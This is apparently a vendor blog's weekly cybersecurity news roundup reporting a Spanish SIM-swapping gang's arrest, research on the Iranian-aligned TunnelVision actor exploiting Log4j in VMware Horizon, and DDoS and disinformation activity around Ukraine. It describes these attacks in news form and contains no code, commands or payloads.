The Good, the Bad and the Ugly in Cybersecurity – Week 7

The Good

Good news this week comes by way of Spanish law enforcement, which publicly announced the dismantling of a criminal SIM-swapping organization. Investigations into the operation began in March 2021, following official complaints from locations across Spain.

The arrest of eight individuals follows a year-long investigation by the National Police into fraudulent bank transfers. The group’s MO was somewhat different from traditional SIM swapping. In this case, the group sought to extract private information from targets through emails and text messages spoofing banks. The collected data was then used to create fake identity documentation for the next stage in the scam.

Rather than just convincing a carrier to register a different SIM to the target’s number, the gang used their fake documentation to convince employees of phone stores to provide duplicate SIMs, which then gave them access to banking security messages and allowed them to conduct financial transactions. Adding insult to injury, the victims’ devices would be disabled once the gang’s devices were activated with the duplicate SIMs.

The eight detainees – seven from Barcelona and one from Seville – laundered their ill-gotten gains through bank transfers and online payment platforms. Police say that besides the arrests they have also blocked twelve bank accounts associated with the gang’s activities.

The Bad

This week SentinelLabs published research on an Iranian-aligned threat actor called TunnelVision. The research focuses on the threat actor’s exploitation of VMware Horizon Log4j vulnerabilities. The TunnelVision actor has been observed targeting organizations throughout the Middle-East and the United States.

TunnelVision has been actively exploiting the Log4j vulnerability in VMware Horizon to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement.

The research takes a look at how this threat actor evolves their attack techniques making use of 1-day vulnerabilities – bugs in software that have recently been patched by vendors but not yet widely updated by organizations. Once the actors gain initial access, they download tunneling software like ngrok, Plink and FRPC (Fast Reverse Proxy Client). The threat actor also aims to avoid detection in its C2 activity by making use of legitimate public services like pastebin, transfer.sh and webhook.site, among others.

While the group’s activity is not new – other vendors have tracked activity similar to TunnelVision under different, sometimes overlapping, threat actor names – SentinelLabs says that the cluster of activity they have observed is distinct enough to warrant unique attribution.

The Ugly

As tensions continue to rise over the Ukrainian crisis, threat activity in the cyber domain has escalated in the last week. Multiple events have occurred including Ukraine technology service disruptions, potential psychological impact-themed efforts and, of course, disinformation.

Multiple Ukrainian bank services and the Ukrainian Ministry of Defense website were temporarily inaccessible due to a DDoS attack this week. Additionally, fake SMS messages have been circulating in Ukraine claiming a large impact to the ATM services across the country. The true objective of these attacks is unclear; however, one theory is that the attackers were attempting to have a psychological impact on the citizens of Ukraine, as well as draw the attention of media outlets around the world.

Disinformation campaigns are also apparent, with the West noting that Russian-controlled media is being seeded with stories of false provocations against Russian interests. Russia’s Foreign Ministry briefed journalists on Monday saying that “Moscow does not rule out provocations against the self-proclaimed republics in Donbass”. Meanwhile, Russia continues to claim that the U.S., in particular, is being deliberately alarmist and using language that only serves to inflame the situation. The Polish Ministry of Foregin Affairs has also been vocal in calling out Russian disinformation on social media.

One thing that no one is in doubt about, however, is that organizations need to be wary of the potential for cyber attacks related to the ongoing situation. CISA released an advisory Wednesday recommending network defenders review the TTPs and IoCs around suspected MBR wiper activity seen targeting Ukrainian organizations. The potential for malicious cyber activity well-beyond that realm, particularly against U.S. targets, should not be underestimated.